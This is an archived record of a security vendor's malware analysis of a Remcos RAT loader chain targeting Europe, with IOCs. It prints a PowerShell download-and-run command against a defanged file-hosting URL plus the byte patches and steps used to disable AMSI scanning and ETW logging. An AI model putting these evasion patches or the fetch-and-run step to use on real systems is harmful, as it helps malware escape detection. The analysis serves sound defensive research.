{
	"id": "2997632b-9a40-46c1-8e0d-88f15adc2426",
	"created_at": "2026-04-06T00:08:19.676874Z",
	"updated_at": "2026-04-10T03:21:32.180471Z",
	"deleted_at": null,
	"sha1_hash": "613c238d902fdde519901a71eb5d7e35f2e09619",
	"title": "Remcos RAT Targets Europe: New AMSI and ETW Evasion Tactics Uncovered",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1291814,
	"plain_text": "Remcos RAT Targets Europe: New AMSI and ETW Evasion\r\nTactics Uncovered\r\nPublished: 2025-02-21 · Archived: 2026-04-05 14:34:42 UTC\r\nThis week, the SonicWall threat research team discovered a new update in the Remcos infection chain aimed at\r\nenhancing its stealth by patching AMSI scanning and ETW logging to evade detection.\r\nThis loader was seen distributing Async RAT in the past but now it has extended its functionality to Remcos RAT\r\nand other malware families. From our analysis, it seems to be targeting European institutions.\r\nInfection Chain\r\nFigure 1: Infection chain\r\nThe initial infection is executed through a VB script embedded within an archive file. On execution, the VB script\r\ncreates a random named batch script in the user’s temporary folder. This batch script is extensively obfuscated and\r\ngets executed in a minimized window state without leaving any visible trace or output on the console. It creates a\r\nself-copy at “%userprofile%\\dwm.bat”. The bulk of the batch content is obfuscated by dividing it into several\r\nstrings assigned to different variables, which are later concatenated.\r\nhttps://www.sonicwall.com/blog/remcos-rat-targets-europe-new-amsi-and-etw-evasion-tactics-uncovered\r\nPage 1 of 8\n\nFigure 2: Obfuscated Batch File\r\nThe concatenated strings from the obfuscated data create a Base64-encoded command that is executed via\r\nPowerShell. The PowerShell initially downloads and executes AMSI bypassing PowerShell script using command\r\n“iwr -UseBasicParsing \"hxxps://0x0[.]st/8KuV.ps1\"”. We will discuss this further. The command is passed with\r\nthe parameters -ErrorAction SilentlyContinue to avoid displaying any errors.\r\nNext, it will decode and decrypt the encoded data from the batch file. It will retrieve the dwm.bat from %user%\r\ndirectory. Then it checks for the presence of “::” in the lines of the batch file. A line containing “::” has encoded\r\ndata appended to the symbol.\r\nFigure 3: PowerShell Decoding data\r\nThe two base64 data segments are then split using the delimiter “\\” with the .Split(‘\\’) method. Both data segments\r\nare initially decoded from Base64 to ASCII. Once decoded, they are decrypted using AES in CBC mode.\r\nhttps://www.sonicwall.com/blog/remcos-rat-targets-europe-new-amsi-and-etw-evasion-tactics-uncovered\r\nPage 2 of 8\n\nFigure 4: AES Decrypt\r\nThe decrypted data is again decompressed using Gzip decompression. The retrieved MSIL assembly is executed\r\nusing the PowerShell invoke function.\r\nAMSI Bypass (PowerShell)\r\nThe Anti-Malware Scan Interface (AMSI) is a Microsoft Windows component that enables applications and\r\nservices to integrate with any antimalware product installed on a system. It is uses by antimalware software to\r\nscan memory, scripts, content source URLs, and more. Following that, AMSI offers protection for PowerShell\r\nscripts, which are commonly exploited by malware for smooth execution.\r\nHere, the PowerShell script downloaded from \"hxxps://0x0[.]st/8KuV.ps1” is used to bypass AMSI to avoid\r\ndetection. Before using any AMSI function, it needs to initiate a communication channel using AmsiInitialize.\r\nFigure 5: AMSIInitialize\r\nThe authors patch the scan function with bytes [0xb8, 0x0, 0x00,0x00,0x00,0xc3]. Here the common technique to\r\nreturn the result as 0x00 in register eax is used.\r\nThe return value of 0x00 indicates AMSI_RESULT_CLEAN indicating that no malware was detected.\r\nhttps://www.sonicwall.com/blog/remcos-rat-targets-europe-new-amsi-and-etw-evasion-tactics-uncovered\r\nPage 3 of 8\n\nFigure 6:  Patch AMSI Context\r\nThe patch is copied using the [System.Runtime.InteropServices.Marshal]::Copy method.\r\nFigure 7:  Copy Patch Bytes\r\nPatching Event Tracing for Windows\r\nEvent tracing for Windows is used to log a majority of changes happening in your Windows system. To bypass\r\nETW, the attacker tries to patch the ntdll.dll function EtwEventWrite which logs ETW events.\r\nFigure 8:  ETW Patching\r\nThis patch will cause the event logger to return on every event without recording any data, preventing event-based\r\nrules from being triggered.\r\nPayload\r\nThe initial PowerShell script executes both the decrypted MSIL assemblies. The first MSIL payload contains no\r\nassembly code; it is simply a dummy file with a size of 4KB. The second decrypted MSIL loader file continues the\r\nexecution process, advancing to the next step.\r\nhttps://www.sonicwall.com/blog/remcos-rat-targets-europe-new-amsi-and-etw-evasion-tactics-uncovered\r\nPage 4 of 8\n\nInitially, it checks for the presence of a file starting with “StartupScript_{Random_string}”  in the startup\r\ndirectory. In this case, the random string is an 8-character substring of a newly generated GUID. This file is a self-replica of the executing file.\r\nFigure 9: Check Startup Drop\r\nNext, the loader again patches event tracing to avoid any detection based on event logging. It patches the function\r\nEtwEventWrite with [0xC2, 0x14, 0x00] or [0xC3].\r\nFor 64-bit, the first 3 bytes will add 0x14 to esp(pop the stack before returning) and then return. Whereas, for 32-\r\nbit it will directly return without changing anything.\r\nFigure 10: Loader ETW patching\r\nFurther, the loader checks for the presence of a DotNet resource named xxxxxxxxxxxxxxxxxxxxxxxxxxxx.exe.\r\nThis resource has encrypted data stored in it.\r\nhttps://www.sonicwall.com/blog/remcos-rat-targets-europe-new-amsi-and-etw-evasion-tactics-uncovered\r\nPage 5 of 8\n\nFigure 11:  Resource Check\r\nThis data is decrypted using AES decryption with a key stored in the payload itself.\r\nFigure 12:  AES Decryption\r\nThe decrypted data is a native shellcode, it is injected and executed in the parent process. There is a high\r\nlikelihood that the shellcode may differ from one payload to another, as we have already seen various campaigns\r\ndistributed through the same infection chain.\r\nIn this sample the shellcode is Remcos RAT:\r\nFigure 13:  Remcos RAT\r\nRemcos RAT is infamous for stealing different credentials including browsers, user information, system\r\ninformation, keylogging, etc. Furthermore, it can be used to control and monitor the victim’s system\r\nhttps://www.sonicwall.com/blog/remcos-rat-targets-europe-new-amsi-and-etw-evasion-tactics-uncovered\r\nPage 6 of 8\n\nFigure 14: Remcos KeyLogger\r\nWe can see in the above image; it copies clipboard data and key logs in file “C:\\ProgramData\\remcos\\logs.dat”.\r\nThis threat detected by SonicWall Capture ATP w/RTDMI.\r\nIOCs\r\nhxxps://0x0[.]st/8KuV.ps1\r\n55e5c8b8cba2ca2f152bf70dde2113f53f3dd42649cae535f55f0362b426e97c\r\n349be2b4b8180ee12e858a7bf43fdaa9af5fccef0c47c1a1408e7ae7265f338f\r\n9d59b5a0c4dd1b91d41ea6fc2fe70f7cd2ab08064834ce51d0751a2deadc1a9b\r\n04fc833b59af93308029d3e87c85e327a1e480508bc78b6a4e46c0cbd65ea8dc\r\nef523c286eea072a9afd853f1c09629eaad923d3283865182ff0f75899fb5aa0\r\n2bd8b2423cae2cdbd1145f4899ebe42762b8a46787a007a14635ece512ca999f\r\nhttps://www.sonicwall.com/blog/remcos-rat-targets-europe-new-amsi-and-etw-evasion-tactics-uncovered\r\nPage 7 of 8\n\nSource: https://www.sonicwall.com/blog/remcos-rat-targets-europe-new-amsi-and-etw-evasion-tactics-uncovered\r\nhttps://www.sonicwall.com/blog/remcos-rat-targets-europe-new-amsi-and-etw-evasion-tactics-uncovered\r\nPage 8 of 8",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.sonicwall.com/blog/remcos-rat-targets-europe-new-amsi-and-etw-evasion-tactics-uncovered"
	],
	"report_names": [
		"remcos-rat-targets-europe-new-amsi-and-etw-evasion-tactics-uncovered"
	],
	"threat_actors": [],
	"ts_created_at": 1775434099,
	"ts_updated_at": 1775791292,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/613c238d902fdde519901a71eb5d7e35f2e09619.pdf",
		"text": "https://archive.orkl.eu/613c238d902fdde519901a71eb5d7e35f2e09619.txt",
		"img": "https://archive.orkl.eu/613c238d902fdde519901a71eb5d7e35f2e09619.jpg"
	}
}